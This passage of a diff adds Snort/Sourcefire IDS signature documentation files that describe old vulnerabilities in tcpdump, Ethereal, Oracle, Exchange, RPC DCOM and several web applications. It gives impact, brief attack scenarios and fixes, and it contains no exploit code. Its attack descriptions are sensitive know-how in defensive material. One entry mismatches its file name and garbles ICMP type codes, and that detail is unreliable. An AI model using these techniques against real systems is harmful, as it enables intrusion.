+cause tcpdump to crash when specific values are supplied to the payload length.
+
+--
+Affected Systems:
+Hosts running tcpdump versions 3.8.1 and earlier
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed isakmp packet that may cause
+a host running tcpdump and analyzing the packet to crash.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10004
+
+--
--- /dev/null
+++ b/doc/signatures/3045.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3045
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/659.txt
@@ -0,0 +1,54 @@
+Rule:
+--
+Sid:
+659
+
+--
+Summary:
+This event is generated when a probe is sent to an SMTP server to determine if the decode alias is supported.
+
+--
+Impact:
+Intelligence gathering activity. This event could be an indication of reconnaissance or an actual attempt to overwrite a sensitive file. If the decode alias is present on the SMTP server, an attacker may use it to overwrite files. 
+
+--
+Detailed Information:
+The decode alias was included to allow email to be sent to a username of decode to process the email content through the uudecode program.  A malicious user could attempt to email a uuencoded file that would overwrite an existing sensitive file. 
+
+--
+Affected Systems:
+Older UNIX Sendmail versions (~1990-1996)
+
+--
+Attack Scenarios:
+An attacker can email a uuencoded file to the decode username to overwrite an existing sensitive file.  
+
+--
+Ease of Attack:
+Simple. Send email containing a uuencoded file to the username decode to overwrite an existing sensitive file.
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove decode in /etc/aliases.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS32
+
+
+--
--- /dev/null
+++ b/doc/signatures/2821.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2821
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure obsolete_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2247.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2247
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Persits AspUpload application.
+
+--
+Impact:
+Information disclosure. Possible retrieval of sensitive system files. 
+Installation of arbitrary files.
+
+--
+Detailed Information:
+Under certain circumstances it is possible to retrieve information from 
+outside the web root of a server using AspUpload by utilizing a 
+directory traversal technique. The same technique can also be used to 
+upload files of the attackers choosing to other areas of the file 
+system.
+
+The vulnerability exists in the sample scripts that accompany the 
+application.
+
+--
+Affected Systems:
+	AspUpload 2.1
+	
+--
+Attack Scenarios:
+The attacker can use a simple directory traversal technique when 
+supplying the filename for upload.
+
+--
+Ease of Attack:
+Simple. NO exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Remove the sample scripts installed by the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3608
+
+--
--- /dev/null
+++ b/doc/signatures/2675.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2675
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure instantiate_offline
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/124-1.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+124-1
+
+--
+Summary:
+This event is generated when the pre-processor xlink2state
+detects network traffic that may constitute an attack. Specifically this
+event is generated when an attempt is made to overflow a static buffer
+associated with the extended verb "X-LINK2STATE" in a possible attempt
+to exploit a known vulnerability in Microsoft Exchange Server.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+Microsoft Exchange Servers are able to use extensions to the SMTP
+protocol to help communicate between Exchange servers. The
+"X-Link2State" verb is used to share routing information between
+Exchange servers.
+
+A buffer overflow condition in the processing of this command may
+present an attacker with the opportunity to execute code of their
+choosing on an affected host.
+
+While some of the extended verbs can be disabled easily by an
+Administrator, this particular command cannot. The affected dynamic link
+library (DLL) must be unregistered. Refer to MS05-021 for details on how
+to unregister the DLL.
+
+--
+Affected Systems:
+	Microsoft Exchange Server 2000 sp3
+	Microsoft Exchange Server 2003
+	Microsoft Exchange Server 2003 sp1
+
+--
+Attack Scenarios:
+An attacker can supply a malicious verb request using the "X-Link2State"
+verb to cause a buffer overflow.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+This event will generate events in an environment where the use of
+extended verbs between Exchange servers is commonplace.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Disable the use of the Microsoft SMTP extensions.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000754.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000754
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "faq.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "faq.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2198.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2198
+
+--
+Summary:
+This event is generated when an attempt is made to access cvslog.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Mozilla Bonsai 1.3.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+Mozilla Bonsai, a CVS query tool, contains an information disclosure vulnerability in cvslog.cgi. An attacker can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which produces an error. The error message shows the full path of the cvslog.cgi file, providing the attacker with information about the server directory structure.
+
+--
+Affected Systems:
+Any system running Mozilla Bonsai 1.3.
+
+--
+Attack Scenarios:
+An attacker sends an erroneous request to cvslog.cgi on the Bonsai server. The error message returns the full path of the script, allowing the attacker to discover more information about the server directory structure for possible use in later attacks.
+
+--
+Ease of Attack:
+Simple. Proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses cvslog.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer build of Mozilla Bonsai 1.3.
+
+If you are running Mozilla Bonsai on Debian 3.0, Debian has provided patches at http://security.debian.org/pool/updates/main/b/bonsai/.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/5517
+
+
+--
--- /dev/null
+++ b/doc/signatures/992.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 992
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2784.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2784
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_update_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1357.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1357
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3300.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3300
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2074.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2074
+
+--
+Summary:
+using the upload.php script.
+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
--- /dev/null
+++ b/doc/signatures/2062.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2062
+
+--
+Summary:
+server performance and statistics package.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+iPlanet web server uses the file .perf to display performance statistics
+for the server.
+
+An attacker can access the statistics for the server by making a request
+for the file .perf.
+
+--
+Affected Systems:
+iPlanet web servers using this object.
+
+--
+Attack Scenarios:
+The attacker merely needs to access http://www.foo.com/.perf
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow viewing of web server statistics from external sources.
+
+Remove the appropriate lines from the obj.conf file to disallow viewing 
+of server performance statistics.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2420.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2420
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/373.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+373
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Flowpoint 2200 DSL router.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Flowpoint 2200 DSL router contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS156
+
+--
--- /dev/null
+++ b/doc/signatures/451.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+
+Sid:
+408
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Timestamp Reply in response to an ICMP Timestamp Request message.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Timestamp Reply message is sent in response to an ICMP RTimestamp Request message.  If the ICMP Timestamp Reply message reaches the requesting host it indicates that the replying host is alive.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Timestamp Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, an attacker may try to use type 14 (timestamp) as an alternative.
+
+--
+
+Attack Scenarios:
+A remote attacker may use ICMP Timestamp Request datagrams to determine active hosts on the network in prelude of further attacks.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 Code 8 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2770.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2770
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_object_from_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000404.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000404
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "articles.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "articles.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1901.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1901
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-7.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-7
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a scan is in progress. That is, packets with the SYN, ACK, URG and
+PUSH flags set have been detected.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1168.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1168
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
